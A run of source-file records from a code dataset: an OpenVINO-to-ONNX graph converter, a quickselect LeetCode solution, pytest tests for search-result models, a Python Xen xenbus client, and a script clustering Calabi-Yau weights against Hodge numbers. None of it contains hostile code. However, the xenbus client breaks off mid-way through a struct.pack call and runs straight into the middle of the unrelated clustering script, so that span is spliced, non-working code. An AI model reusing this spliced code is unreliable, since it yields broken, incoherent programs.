onnx.helper.make_node(\n 'Flatten',\n inputs=flatten_inputs,\n outputs=flatten_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=gemm_inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n else:\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n\n length = vinode.weights['arr'].shape[0]\n output_size = as_int(vinode.data['out-size'])\n input_size = int(length / output_size)\n\n if vinode.weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size, input_size),\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size,),\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_matmul_10(vinode, bias_vinode, prev_vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n dims = vinode.output[0]\n prev_dims = prev_vinode.output[0]\n\n inputs[0] = str(prev_vinode.id)\n if bias_vinode:\n bias_inputs, bias_outputs = io(bias_vinode)\n outputs = bias_outputs\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1] + ['W{}'.format(vinode.id)]\n if bias_vinode:\n biases = vinodes[int(bias_inputs[1])]\n inputs += 
['b{}'.format(vinode.id)]\n\n if len(dims) != len(prev_dims):\n flatten_inputs = [inputs[0]]\n flatten_outputs = [_buf]\n gemm_inputs = [_buf] + inputs[1:]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=flatten_inputs,\n outputs=flatten_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=gemm_inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n else:\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n\n \n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(weights.data['shape']),\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n if bias_vinode and biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:2],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_identity(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n node = onnx.helper.make_node('Identity', inputs[:1], outputs, name = str(vinode.id))\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_topk(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n axis = int(vinode.data['axis'])\n mode = vinode.data['mode']\n\n idim = vinode.input[0]\n if axis!= 1:\n errmsg=\"ERROR: Node {}: TopK is only supported on axis 1\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n maps = idim[axis]\n if maps > 256:\n errmsg=\"ERROR: Node {}: TopK is only supported on less than 256 maps\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n\n if mode != 'max':\n errmsg=\"ERROR: Node {}: TopK is only supported with mode == max\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n\n buf = outputs[0]\n _buf = outputs[0] + '_ss'\n argmax_inputs = [inputs[0]]\n cast_inputs = [_buf]\n\n node = onnx.helper.make_node('ArgMax', argmax_inputs, [_buf], name = _buf, axis=axis)\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Cast',\n inputs=cast_inputs,\n outputs=outputs,\n name=buf,\n to=int(onnx.TensorProto.FLOAT)\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_softmax(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n axis = int(vinode.data['axis'])\n input_shape = one_elem(vinode.input)\n batch_size_axis = 0\n for i,s in enumerate(input_shape):\n if i==axis or i==batch_size_axis:\n continue\n if s == 1:\n continue\n errmsg=\"ERROR: Node {}: input shape {} with axis {} not supported for softmax\\n\"\n sys.stderr.write(errmsg.format(vinode.name,input_shape,axis))\n sys.exit(1)\n\n node = onnx.helper.make_node(\n 'Softmax',\n inputs = inputs,\n outputs = outputs,\n axis=axis,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_transpose(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n input_shape = vinode.input[0]\n output_shape = vinode.output[0]\n \n perm_node = vinodes[int(inputs[1])]\n perm = perm_node.data['arr'].tolist()\n test_array = np.random.rand(*input_shape)\n if np.array_equal(test_array.reshape(output_shape), test_array.transpose(perm)):\n #transpose is equivalent to reshape\n return gen_reshape(vinode)\n\n if (perm not in ([0,2,3,1],)) and ('reorg' not in vinode.name.lower()):\n sys.stderr.write(\"ERROR:Node {}: permutation '{}' not supported\\n\".format(vinode.name,perm))\n sys.exit(1)\n inputs = 
inputs[:1]\n node = onnx.helper.make_node('Transpose',\n inputs = inputs,\n outputs = outputs,\n perm = perm,\n name = str(vinode.id))\n nodes.append(node)\n return nodes, inits\n\n\ndef is_constant(vinode, vinodes):\n if vinode.type in ['ShapeOf', 'Const']:\n return True\n elif vinode.type in ['Gather', 'Concat']:\n inputs, outputs = io(vinode)\n return all([is_constant(vinodes[int(i)], vinodes) for i in inputs])\n\n return False\n\n\ndef gen_graph_io(vinodes, nodes):\n inputs = []\n outputs = []\n \n for n in nodes:\n previous_nodes = onnx_helper.get_previous_nodes(nodes, n)\n if len(previous_nodes) == 0:\n #is input node\n vinode = one_elem([vi for vi in vinodes if str(vi.id) == n.name])\n if vinode.type == 'Add':\n #sometimes the node is named after the biasing vinode after it\n #so we need to find the actual node before it.\n possible_vinode = [vi for vi in vinodes if len(vi._to) and vi.id == vinode._from[0]]\n if len(possible_vinode)!=0:\n vinode = one_elem(possible_vinode)\n\n #TODO Handle more than one input on an input node.\n try:\n constant_inputs = [is_constant(vinodes[int(i)], vinodes) for i in io(vinode)[0]]\n shape = vinode.input[0]\n if constant_inputs[0]:\n shape = vinode.input[1]\n except Exception:\n shape = vinode.output[0]\n inputs.append(onnx.helper.make_tensor_value_info('{}'.format(n.input[0]), onnx.TensorProto.FLOAT, shape))\n next_nodes = []\n for no in n.output:\n next_nodes.extend(onnx_helper.get_node_inputs(nodes,no))\n if len(next_nodes) == 0:\n #is output node\n vinode = one_elem([vi for vi in vinodes if str(vi.id) == n.name])\n #TODO Handle more than one output on an output node.\n shape = vinode.output[0]\n outputs.append(onnx.helper.make_tensor_value_info('{}'.format(n.output[0]), onnx.TensorProto.FLOAT, shape))\n return inputs, outputs\n\n\ndef gen_onnx(vinodes):\n graph_nodes = []\n graph_inits = []\n\n prev_vinode = None\n vidx = 0\n while vidx < len(vinodes):\n vinode = vinodes[vidx]\n if vidx+1 < len(vinodes):\n next_vinode = vinodes[vidx+1]\n else:\n next_vinode = None\n if vinode.type == 'Parameter':\n nodes, inits = gen_input(vinode)\n elif vinode.type == 'PReLU':\n nodes, inits = gen_prelu_10(vinode, vinodes)\n elif vinode.type in ['Result', 'ShapeOf', 'Convert', 'Range']:\n nodes, inits = [],[]\n elif vinode.type == 'Gather':\n if is_constant(vinode, vinodes):\n nodes, inits = [],[]\n else:\n raise NotImplementedError('Non-const {} not implemented'.format(vinode.type))\n continue\n elif vinode.type == 'Const':\n nodes, inits = [], []\n vidx += 1\n continue\n elif vinode.type == 'Multiply':\n nodes, inits = gen_multiply_10(vinode, vinodes)\n elif vinode.type == 'Add':\n nodes, inits = gen_add_10(vinode, vinodes)\n elif vinode.type == 'Convolution':\n bias_vinode = None\n if len(vinodes) > vidx+2 and vinodes[vidx+1].type == 'Const' and vinodes[vidx+2].type == 'Add':\n bias_vinode = vinodes[vidx+2]\n vidx +=2\n nodes, inits = gen_conv_10(vinode, bias_vinode, vinodes)\n elif vinode.type == 'GroupConvolution':\n bias_vinode = None\n if len(vinodes) > vidx+2 and vinodes[vidx+1].type == 'Const' and vinodes[vidx+2].type == 'Add':\n bias_vinode = vinodes[vidx+2]\n vidx +=2\n nodes, inits = gen_group_conv_10(vinode, bias_vinode, vinodes)\n elif vinode.type == 'MatMul':\n bias_vinode = None\n if len(vinodes) > vidx+2 and vinodes[vidx+1].type == 'Const' and vinodes[vidx+2].type == 'Add':\n bias_vinode = vinodes[vidx+2]\n vidx +=2\n nodes, inits = gen_matmul_10(vinode, bias_vinode, prev_vinode, vinodes)\n elif vinode.type == 'ReLU':\n nodes, inits = gen_relu(vinode)\n 
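# a Concat whose inputs are all constants is shape bookkeeping rather than data flow, so it is dropped below\n 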
elif vinode.type == 'Concat':\n if is_constant(vinode, vinodes):\n nodes, inits = [],[]\n else:\n nodes, inits = gen_concat(vinode)\n elif vinode.type == 'Squeeze':\n nodes, inits = gen_reshape(vinode)\n elif vinode.type == 'ReduceMean':\n nodes, inits = gen_reduce_10(vinode)\n elif vinode.type == 'AvgPool':\n nodes, inits = gen_avgpool_10(vinode)\n elif vinode.type == 'MaxPool':\n nodes, inits = gen_maxpool_10(vinode)\n elif vinode.type == 'SoftMax':\n nodes, inits = gen_softmax(vinode)\n elif vinode.type == 'Reshape':\n nodes, inits = gen_reshape(vinode)\n elif vinode.type == 'RegionYolo':\n nodes, inits = gen_reshape(vinode)\n elif vinode.type == 'Flatten':\n nodes, inits = gen_flatten(vinode)\n # elif vinode.type == 'ReorgYolo':\n # nodes, inits = gen_reorg_yolo(vinode)\n elif vinode.type == 'ExtractImagePatches':\n nodes, inits = gen_extract(vinode)\n elif vinode.type == 'Interpolate':\n nodes, inits = gen_interpolate(vinode)\n elif vinode.type == 'Transpose':\n nodes, inits = gen_transpose(vinode, vinodes)\n elif vinode.type == 'Clamp':\n nodes, inits = gen_clamp(vinode)\n elif vinode.type == 'LRN':\n nodes, inits = gen_norm(vinode)\n elif vinode.type == 'TopK':\n nodes, inits = gen_topk(vinode)\n elif vinode.type == 'Pad':\n nodes, inits = gen_pad_10(vinode, vinodes)\n else:\n raise NotImplementedError('{} not implemented'.format(vinode.type))\n continue\n prev_vinode = vinodes[vidx]\n vidx += 1\n graph_nodes += nodes\n graph_inits += inits\n return graph_nodes, graph_inits\n\n\ndef gen_pad_graph():\n\n X = onnx.helper.make_tensor_value_info('X', onnx.TensorProto.FLOAT, (1,2))\n Y = onnx.helper.make_tensor_value_info('Y', onnx.TensorProto.FLOAT, (1,4))\n\n\n node = onnx.helper.make_node(\n 'Pad',\n ['X'],\n ['Y'],\n mode='constant',\n pads=[0,1,0,1],\n value=1.5,\n )\n nodes = [node]\n inputs = [X]\n outputs = [Y]\n initializers = []\n\n graph = onnx.helper.make_graph(\n nodes,\n 'pad-graph',\n inputs,\n outputs,\n initializers,\n )\n\n return graph\n\n\ndef gen_softmax_graph():\n\n X = onnx.helper.make_tensor_value_info('X', onnx.TensorProto.FLOAT, (1,1000))\n Y = onnx.helper.make_tensor_value_info('Y', onnx.TensorProto.FLOAT, (1,1000))\n\n\n node = onnx.helper.make_node(\n 'Softmax',\n ['X'],\n ['Y'],\n )\n nodes = [node]\n inputs = [X]\n outputs = [Y]\n initializers = []\n\n graph = onnx.helper.make_graph(\n nodes,\n 'softmax-graph',\n inputs,\n outputs,\n initializers,\n )\n\n return graph\n\n\ndef convert_openvino_xml_to_onnx(vinodes, graph_name, version):\n assert(version == '10')\n nodes, inits = gen_onnx(vinodes)\n inputs, outputs = gen_graph_io(vinodes, nodes)\n\n for input in inputs:\n input.type.tensor_type.shape.dim[0].dim_param = \"N\"\n for output in outputs:\n output.type.tensor_type.shape.dim[0].dim_param = \"N\"\n\n graph = onnx.helper.make_graph(\n nodes,\n graph_name,\n inputs,\n outputs,\n inits,\n )\n\n return graph\n\n\ndef save_stats(nodes, output_file):\n stats = []\n for node in nodes:\n if not (node.min is None) and not (node.max is None):\n if not (node.mean is None):\n stats.append({\n 'name': node.name, 'id': node.id,\n 'min': node.min.tolist(), 'max': node.max.tolist(), 'mean': node.mean.tolist(),\n 'input': node.input, 'output': node.output})\n else:\n stats.append({\n 'name': node.name, 'id': node.id,\n 'min': node.min.tolist(), 'max': node.max.tolist(),\n 'input': node.input, 'output': node.output})\n\n with open(output_file, 'w') as f:\n json.dump(stats, f)\n\n\ndef cut_after_node(nodes, cut):\n cut_nodes = []\n for n in nodes:\n if n.name == cut:\n 
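# record the id of the node named by --cut; nodes with larger ids are dropped and the cut node's outgoing edges cleared\n 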
max_id = n.id\n\n for n in nodes:\n if n.id < max_id:\n cut_nodes.append(n)\n elif n.id == max_id:\n n._to = []\n cut_nodes.append(n)\n\n return cut_nodes\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('xml')\n parser.add_argument('-s', '--stats', action='store_true')\n parser.add_argument('-r', '--random', action='store_true')\n parser.add_argument('-i', '--image')\n parser.add_argument('-t', '--topk', action='store_true')\n parser.add_argument('-j', '--json', action='store_true')\n parser.add_argument('-c', '--cut')\n args = parser.parse_args()\n\n model_name = args.xml.split('.xml')[0]\n onnx_name = '{}.onnx'.format(model_name)\n\n nodes, ir_version = parse_openvino_xml(args.xml)\n if args.cut:\n nodes = cut_after_node(nodes, args.cut)\n\n graph = convert_openvino_xml_to_onnx(nodes, model_name, ir_version)\n onnx_save_model(graph, onnx_name)\n\n if args.stats: # save layer statistics\n save_stats(nodes, model_name)\n\n if args.random: # test random input\n input_array = onnx_random_input(onnx_name)\n output = onnx_infer(onnx_name, input_array)\n if args.topk:\n imagenet.print_topk(output.flatten())\n\n if args.image: # test input image\n input_array = load_image(args.image)\n output = onnx_infer(onnx_name, input_array)\n if args.topk:\n imagenet.print_topk(output.flatten())\n if args.json:\n with open('{}.json'.format(onnx_name), 'w') as f:\n json.dump(output.flatten().tolist(), f)\n","repo_name":"Umair772/VectorBlox-SDK","sub_path":"python/vbx/vbx/generate/onnx_convert.py","file_name":"onnx_convert.py","file_ext":"py","file_size_in_byte":53206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"17280392524","text":"\"\"\"\nQuestions:\nGiven an integer array nums and an integer k, return the kth largest element in the array.\nNote that it is the kth largest element in the sorted order, not the kth distinct element.\nExample 1:\nInput: nums = [3,2,1,5,6,4], k = 2\nOutput: 5\n\nSoln:\nquicksort, random pick pivot and arrange smaller nums on left and count\nif count < k then go to right section and repeat\nif count >k, then go to left section and repeat\nif count == k, return \n\"\"\"\nclass Solution(object):\n def findKthLargest(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.findKthSmallest(nums, 0, len(nums)-1, len(nums)+ 1 - k)\n \n def findKthSmallest(self, nums, left, right, k):\n import random\n if left == right:\n return nums[left]\n pivot = random.randint(left, right)\n idx = self.partition(nums, left, right, pivot)\n if idx +1 == k:\n return nums[idx]\n elif idx + 1 > k:\n return self.findKthSmallest(nums, left, idx-1, k)\n else:\n return self.findKthSmallest(nums, idx+1, right, k)\n \n def partition(self, nums, left, right, pivot):\n val = nums[pivot]\n nums[pivot], nums[right] = nums[right], nums[pivot]\n j = left\n for i in range(left, right):\n if nums[i] < val:\n nums[i], nums[j] = nums[j], nums[i]\n j+=1\n nums[right], nums[j] = nums[j], nums[right]\n return j ","repo_name":"GaaryApple/MyLeetcode","sub_path":"215_Kth_Largest_Elements_in_an_array/215_Kth_Largest_Elements_in_an_array.py","file_name":"215_Kth_Largest_Elements_in_an_array.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"134902629","text":"import pytest\nimport io\nimport json\nfrom stand import models\n\n\ndef test_serpset_by_metrics_filename():\n print()\n 
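# gzipped serpset fixture; the expected query and document counts are asserted below\n 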
metrics_filename = 'data/10681888.json.gz'\n scales = ['RELEVANCE']\n serpset = models.Serpset(metrics_filename=metrics_filename, scales=scales)\n assert len(serpset.queries) == 2015\n assert sum(1 for query, docs in serpset if docs) == 2014\n # for all docs there're query, url and pos fields\n assert all((doc.query is not None) and (doc.url is not None) and (doc.pos is not None) for doc in serpset.docs)\n # for every scale there's at least one document containing it\n assert all(any(scale in doc.scales for doc in serpset.docs) for scale in scales)\n\n\ndef test_serpset_by_filename():\n print()\n data = {\n \"some_query\": [\n {\n \"url\": \"some_url\",\n \"qid\": \"1332\"\n }\n ]\n }\n data_filename = \"data/tmp.json\"\n with open(data_filename, \"w\") as f:\n json.dump(data, f)\n serpset = models.Serpset(filename=data_filename)\n assert len(serpset.docs) == 1\n assert serpset.docs[0].qid == \"1332\"\n\n\ndef test_serpset_actions():\n print()\n serpset = models.Serpset()\n serpset.add_query('query_1')\n serpset.add_doc('query_2', url='http://fake.url')\n assert len(serpset.queries) == 2\n assert len(serpset['query_1']) == 0\n assert len(serpset['query_2']) == 1\n assert serpset['query_2'][0].query == 'query_2'\n assert serpset['query_2'][0].url == 'http://fake.url'\n assert serpset['query_2'][0].pos == 0\n assert serpset['query_2'][0].scales is None\n assert serpset['query_2'][0].mimca is None\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"extsearch/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33836836622","text":"#!/usr/bin/env python\n\nimport logging\nimport os\nimport sys\nimport struct\n\nlog = logging.getLogger(__name__)\n\nXS_LIST = 1\nXS_READ = 2\nXS_WRITE = 11\nXS_RM = 13\nXS_ERROR = 16\nXS_HDR_SZ = 16\n\nNUL = b'\\x00'\n\n\nclass XSOps(object):\n def __init__(self):\n self.vals = [XS_LIST, XS_READ, XS_WRITE, XS_RM]\n\n def __iter__(self):\n return iter(self.vals)\n\n\nclass ProcXenBus(object):\n\n def __enter__(self):\n self.fd = os.open(\"/proc/xen/xenbus\", os.O_RDWR)\n self.ops = XSOps()\n self.rq_id = -1\n return self\n\n def __exit__(self, *exc_info):\n os.close(self.fd)\n\n #\n # Public methods\n #\n def read(self, path):\n self.__exec_cmd(XS_READ, path)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = ''\n if self.__error_chk(XS_READ, op, size):\n return result\n return os.read(self.fd, size) if size > 0 else result\n\n def list(self, path):\n self.__exec_cmd(XS_LIST, path)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = []\n if self.__error_chk(XS_LIST, op, size):\n return result\n\n if size > 0:\n data = os.read(self.fd, size)\n # NUL is a bytes constant, so strip/split the raw bytes and decode each entry\n for item in data.rstrip(NUL).split(NUL):\n result.append(item.decode('utf-8'))\n return result\n\n def write(self, path, data):\n self.__exec_cmd(XS_WRITE, path, data)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = ''\n if self.__error_chk(XS_WRITE, op, size):\n return result\n\n if size > 0:\n status = os.read(self.fd, size)\n # compare bytes with bytes; decoding first would make the b\"OK\" check always fail\n if status.rstrip(NUL) != b\"OK\":\n raise RuntimeError('write: unable to store value')\n return\n\n def delete(self, path):\n self.__exec_cmd(XS_RM, path)\n (op, rq_id, tx_id, size) = self.__get_header()\n\n result = ''\n if self.__error_chk(XS_RM, op, size):\n return result\n return os.read(self.fd, size) if size > 0 else result\n\n #\n # Private methods\n #\n def 
__exec_cmd(self, op, path, data=None):\n if op not in self.ops:\n raise ValueError('Invalid Operation Specified')\n\n if data is None:\n wlen = len(path) + 1\n wdat = path + NUL\n else:\n # accept str or bytes payloads; the wire format needs bytes\n byts = data if isinstance(data, bytes) else data.encode('utf-8')\n wlen = len(path) + 1 + len(byts)\n wdat = path + NUL + byts\n\n rq_id = self.__next_rq_id()\n # header is four little-endian uint32s (XS_HDR_SZ == 16 bytes); tx_id 0 means no transaction\n os.write(self.fd, struct.pack(\"<IIII\", op, rq_id, 0, wlen) + wdat)\n\n def __next_rq_id(self):\n self.rq_id += 1\n return self.rq_id\n\n def __get_header(self):\n # returns (op, rq_id, tx_id, size)\n return struct.unpack(\"<IIII\", os.read(self.fd, XS_HDR_SZ))\n\n def __error_chk(self, cop, resop, resz):\n if resop == XS_ERROR and resz > 0:\n msg = os.read(self.fd, resz)\n msg = msg.rstrip(NUL).decode('utf-8')\n log.debug('%s: got %s from xenstore',\n self.__op_to_str(cop), msg)\n return -1\n elif resop != cop:\n log.debug('%s: xenstore returned bad op %d',\n self.__op_to_str(cop), resop)\n if resz > 0:\n os.read(self.fd, resz)\n return -2\n return 0\n\n def __dump_header(self, header):\n (op, rq_id, tx_id, size) = struct.unpack(\"5\nh = 0 #...choose: 0 for h11, 1 for h21\n\n#Plot scatter graph across CY dataset\nplt.figure('Hodge Number Correlations: '+str(w_idx))\nplt.scatter(CY[:,w_idx-1],Hodge[:,h],alpha=0.1)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{2,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('h21_vs_w'+str(w_idx)+'.pdf')\n\n#%% #3d plot each weight vs h11 and h21\n#Select weight to plot\nw_idx = 5\n\n#Plot 3d scatter graph with both Hodge numbers\nfig = plt.figure()\nax = Axes3D(fig)\nax.scatter(CY[:,w_idx-1],Hodge[:,0],Hodge[:,1],alpha=0.1)\nax.set_xlabel(r'$weight $ '+str(w_idx))\nax.set_ylabel(r'$h^{1,1}$')\nax.set_zlabel(r'$h^{2,1}$')\nax.view_init(30, 30) #...adjust viewpoint of 3d plot here\nax.xaxis.labelpad=15\nax.yaxis.labelpad=12\nax.zaxis.labelpad=12\nax.dist = 12.5\n#plt.savefig('./3d_w'+str(w_idx)+'_vs_hs.pdf')\n\n#%% #Plot each weight vs Euler number\n#Select weight to plot\nw_idx = 5\nplt.figure('Weights vs Euler number')\nplt.scatter(CY[:,w_idx-1],[-2*(y[0]-y[1]) for y in Hodge],alpha=0.1)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$\\chi$')\nplt.grid()\n#plt.savefig('Euler_vs_w'+str(w_idx)+'.pdf')\n\n\n################################################################################\n'''Clustering'''\n#%% #Plot histogram of h11/w5 gradient data\n#Select hyperparams to consider\nw_idx = 5 #...choose weight to plot: 1->5\nh = 0 #...choose: 0 for h11, 1 for h21\nall_data = False #...choose whether to plot ratios for all the data, or just the 'outer' data\n\nif all_data:\n raw_k_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY))])\n plt.hist(raw_k_data,bins=int(max(raw_k_data)*50),range=(0,max(raw_k_data)+0.01),histtype='step')\nelse:\n raw_outer_k_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY)) if CY[x][w_idx-1] > 250])\n plt.hist(raw_outer_k_data,bins=int(max(raw_outer_k_data)*50),range=(0,max(raw_outer_k_data)+0.01),histtype='step')\n#for clust_cent in kmeans.cluster_centers_.flatten(): plt.axvline(x=clust_cent,color='black',lw=0.8,linestyle='--') #...unhash this to add the cluster centres to the plot (must run subsequent cell first to define them)\nplt.xlabel(r'$h^{1,1}/w_5$')\nplt.ylabel('Frequency')\nplt.grid()\nplt.tight_layout()\n#plt.savefig('grad(h11w5)_histogram.pdf')\n\n#%% #Perform K-Means clustering\n#Select hyperparams to consider\nw_idx = 5 #...choose weight to plot: 1->5\nh = 0 #...choose: 0 for h11, 1 for h21\nall_data = False #...choose whether to cluster based on all the data, or focus on the outer data where classes more prominent\npreset_number_clusters = 0 #...set to chosen number of clusters, or to zero to determine optimal number of clusters\nmax_inertia = True #...select True to calculate optimum number of clusters using max distance to a 
cluster ('max-inertia'), or False to use average distance (inertia)\n\n#Define datasets of ratios, one with only 'outer' data to encourage good cluster identification\nall_ratio_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY))]).reshape(-1,1)\nouter_ratio_data = np.array([float(Hodge[x][h])/CY[x][w_idx-1] for x in range(len(CY)) if CY[x][w_idx-1] > 250]).reshape(-1,1) #...update cutoff if not considering h11 vs w5\n\nif all_data: ratio_data = all_ratio_data\nelse: ratio_data = outer_ratio_data\n\n#Run K-Means CLustering\nif preset_number_clusters:\n #Perform K-Means clustering (use preset number of clusters)\n kmeans = KMeans(n_clusters=preset_number_clusters).fit(ratio_data) \nelse:\n if max_inertia:\n #Plot scaled max-inertia distribution to determine optimal number of clusters\n max_dists = []\n #Compute single cluster max squared distance\n kmeans = KMeans(n_clusters=1).fit(ratio_data)\n transformed_data = kmeans.transform(ratio_data) \n single_clust_max_dist = max([min(x)**2 for x in transformed_data])\n #Compute the max distances to nearest cluster for each datapoint for all numbers of clusters\n for k in range(1,21):\n kmeans = KMeans(n_clusters=k).fit(ratio_data)\n transformed_data = kmeans.transform(ratio_data) #...data transformed to list distance to all centres\n max_dists.append(max([min(x)**2 for x in transformed_data])/single_clust_max_dist + 0.01*(k-1)) #...compute the scaled max distance over the full dataset\n \n #Determine optimal number of clusters\n k_optimal = list(range(1,21))[max_dists.index(min(max_dists))]\n print('Optimal number of clusters: '+str(k_optimal))\n \n plt.figure('K-Means Max-Inertia')\n plt.scatter(list(range(1,21)),max_dists)\n plt.xlabel('Number of Clusters')\n plt.xticks(range(21))\n plt.ylabel('Scaled Max-Inertia')\n plt.ylim(0,1.05)\n plt.grid()\n plt.tight_layout()\n #plt.savefig('./KMeansScaledMaxSquared-Distance.pdf')\n\n else:\n #Plot scaled inertia distribution to determine optimal number of clusters\n inertia_list = []\n single_clust_inertia = KMeans(n_clusters=1).fit(ratio_data).inertia_\n for k in range(1,21):\n scaled_inertia = KMeans(n_clusters=k).fit(ratio_data).inertia_ / single_clust_inertia + 0.01*(k-1)\n inertia_list.append(scaled_inertia)\n \n #Determine optimal number of clusters\n k_optimal = list(range(1,21))[inertia_list.index(min(inertia_list))]\n print('Optimal number of clusters: '+str(k_optimal))\n \n plt.figure('K-Means Inertia')\n plt.scatter(list(range(1,21)),inertia_list)\n plt.xlabel('Number of Clusters')\n plt.xticks(range(21))\n plt.ylabel('Scaled Inertia')\n plt.ylim(0,1.05)\n plt.grid()\n plt.tight_layout()\n #plt.savefig('./KMeansInertia.pdf')\n \n #Perform K-Means clustering (use computed optimal number of clusters)\n kmeans = KMeans(n_clusters=k_optimal).fit(ratio_data) \n\n#Compute clustering over the full ratio data (irrespective of whether full or outer used to identify clusters)\ntransformed_full_data = kmeans.transform(all_ratio_data) #...data transformed to list distance to all centres\nkmeans_labels = np.argmin(transformed_full_data,axis=1) #...identify the closest cluster centre to each datapoint\nfull_data_inertia = np.sum([min(x)**2 for x in transformed_full_data]) #...compute the inertia over the full dataset\ncluster_sizes = Counter(kmeans_labels) #...compute the frequencies in each cluster\nprint('\\nCluster Centres: '+str(kmeans.cluster_centers_.flatten())+'\\nCluster sizes: '+str([cluster_sizes[x] for x in range(10)])+'\\n\\nInertia: 
'+str(full_data_inertia)+'\\nNormalised Inertia: '+str(full_data_inertia/7555)+'\\nNormalised Inertia / range: '+str((full_data_inertia/(7555*(max(all_ratio_data)-min(all_ratio_data))))[0]))\n\n#%% #Plot full data with cluster centre lines overlaid\nplt.figure('K-Means centres overlaid')\nplt.scatter(CY[:,w_idx-1],Hodge[:,h],alpha=0.1)\nfor grad in kmeans.cluster_centers_.flatten():\n plt.plot(np.linspace(0,2000,2),grad*np.linspace(0,2000,2),color='black',lw=0.5)\nplt.xlim(0,1800)\nplt.ylim(0,np.round(max(Hodge[:,h]),-1)+50)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{1,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('kmeans_overlaidcentres_h11vsw'+str(w_idx)+'.pdf')\n\n#%% #Plot data with cluster bounds overlaid\ncentres = np.sort(kmeans.cluster_centers_.flatten())\ncluster_bounds = (centres[:-1]+centres[1:])/2\n\nplt.figure('K-Means bounds overlaid')\nplt.scatter(CY[:,w_idx-1],Hodge[:,h],alpha=0.1)\nfor grad in cluster_bounds:\n plt.plot(np.linspace(0,2000,2),grad*np.linspace(0,2000,2),color='black',lw=0.5)\nplt.xlim(0,1800)\nplt.ylim(0,np.round(max(Hodge[:,h]),-1)+50)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{1,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('kmeans_overlaidbounds_h11vsw'+str(w_idx)+'.pdf')\n\n#%% #Plot the clusters in different colours\nplt.figure('K-Means clusters coloured')\nfor cluster_idx in list(range(len(cluster_sizes))):\n plt.scatter([CY[x][w_idx-1] for x in range(len(CY)) if kmeans_labels[x] == cluster_idx],[Hodge[y][h] for y in range(len(Hodge)) if kmeans_labels[y] == cluster_idx],alpha=0.1)\nplt.xlim(0,1800)\nplt.ylim(0,np.round(max(Hodge[:,h]),-1)+50)\nplt.xlabel(r'$weight $ '+str(w_idx))\nplt.ylabel(r'$h^{1,1}$')\nplt.tight_layout()\nplt.grid()\n#plt.savefig('kmeans_clusterscoloured_h11vsw'+str(w_idx)+'.pdf')\n\n#%% #Save the outer data in each cluster to a file for comparison\n#Identify the number of clusters\nif preset_number_clusters: number_clusters = preset_number_clusters\nelse: number_clusters = k_optimal\n#Extract outer data and cluster labels\nCY_outer = [list(CY[x]) for x in range(len(CY)) if CY[x][w_idx-1] > 250]\nCY_outer_labels = kmeans.labels_\n#Sort into respective clusters\nclusters = [[] for i in range(number_clusters)]\nfor v_idx in 